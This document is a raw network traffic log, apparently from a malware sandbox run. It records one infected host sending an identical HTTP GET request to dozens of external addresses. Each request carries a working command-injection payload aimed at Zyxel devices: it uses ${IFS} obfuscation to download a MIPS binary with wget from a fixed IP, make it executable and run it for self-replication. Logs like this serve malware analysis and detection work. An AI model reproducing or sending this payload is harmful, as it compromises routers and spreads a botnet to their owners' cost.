                                                        Jan 28, 2024 10:12:49.335949898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3533192.168.2.144217045.247.88.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335951090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3534192.168.2.1437694141.110.229.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.335951090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3535192.168.2.144263234.90.255.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336117029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3536192.168.2.1443874176.71.153.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336155891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3537192.168.2.1451094161.207.183.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336158991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3538192.168.2.144103092.225.208.60443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336162090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3539192.168.2.144591651.54.89.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336184025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3540192.168.2.145309635.111.50.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336224079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3541192.168.2.1459498119.248.214.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336226940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3542192.168.2.1448342175.177.38.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336275101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3543192.168.2.1449490121.36.43.64443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336280107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3544192.168.2.1459672102.43.174.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336332083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3545192.168.2.1454366128.130.30.54443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336350918 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3546192.168.2.144998087.192.4.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336431026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3547192.168.2.1445674217.115.11.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336435080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3548192.168.2.145013254.99.74.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336466074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3549192.168.2.1451480102.181.35.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336484909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3550192.168.2.144212679.177.120.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336524963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3551192.168.2.1456270121.52.210.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336563110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3552192.168.2.1436522201.165.105.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336585999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3553192.168.2.143832236.1.251.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336637974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3554192.168.2.1451576146.84.66.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336669922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3555192.168.2.1438942111.176.142.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336705923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3556192.168.2.144056039.242.24.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336754084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3557192.168.2.1435040219.153.112.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336826086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3558192.168.2.144055048.231.7.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336826086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3559192.168.2.145969898.179.41.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336853981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3560192.168.2.145423027.26.168.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336884022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3561192.168.2.144021480.91.104.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336896896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3562192.168.2.144512644.209.240.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336950064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3563192.168.2.1434032168.14.129.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.336991072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3564192.168.2.1436224175.26.154.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337028980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3565192.168.2.1445314181.114.119.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337061882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3566192.168.2.1441028153.136.239.127443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337105036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3567192.168.2.1450156128.137.118.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337140083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3568192.168.2.145047065.155.231.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337162018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3569192.168.2.1439076139.186.35.182443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337194920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3570192.168.2.1437906189.96.33.252443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337241888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3571192.168.2.144370238.47.117.45443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337271929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3572192.168.2.1440028172.69.50.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337296963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3573192.168.2.143346612.153.218.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337337971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3574192.168.2.1452912188.90.49.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337388992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3575192.168.2.1440754216.99.228.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337433100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3576192.168.2.1457608202.6.71.110443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337452888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3577192.168.2.1437104201.173.72.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337508917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3578192.168.2.144832641.207.191.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337536097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3579192.168.2.1444676103.254.151.109443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337570906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3580192.168.2.145788432.115.135.8443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337619066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3581192.168.2.1457046122.222.131.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337651968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3582192.168.2.1442384132.194.136.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337702990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3583192.168.2.1442054196.74.39.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337744951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3584192.168.2.1456414148.29.96.236443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337773085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3585192.168.2.145538446.36.186.4443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337800980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3586192.168.2.1459178220.79.134.87443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337857008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3587192.168.2.145865492.65.88.41443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337884903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3588192.168.2.1452192125.91.5.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337913990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3589192.168.2.144547682.202.121.95443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337938070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3590192.168.2.144283878.185.47.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.337980986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3591192.168.2.1441770149.223.190.254443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338012934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3592192.168.2.1459120103.179.167.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:49.338046074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3593192.168.2.144698825.157.181.162443
                                                        TimestampBytes transferredDirectionData
